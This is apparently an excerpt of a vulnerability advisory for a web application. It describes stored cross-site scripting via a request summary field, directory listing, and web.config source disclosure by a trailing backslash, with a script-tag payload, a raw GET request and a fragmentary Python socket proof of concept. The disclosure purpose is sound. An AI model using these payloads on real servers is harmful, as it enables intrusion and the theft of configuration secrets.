User submitted data is not HTML entity encoded before it is rendered.
Login using the web client and submit a request with summary set to <script>alert(0)</script>. Navigate to My History to see the result.
The contents of the root directory can be listed by using a specially crafted URL.
Configuration / Source Disclosure
Forbidden file types (e.g. ascx, config) can be downloaded by appending a backslash to the filename.
GET /web.config\ HTTP/1.1
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.send('GET /web.config\ HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
response = s.recv(8192)
if not response: break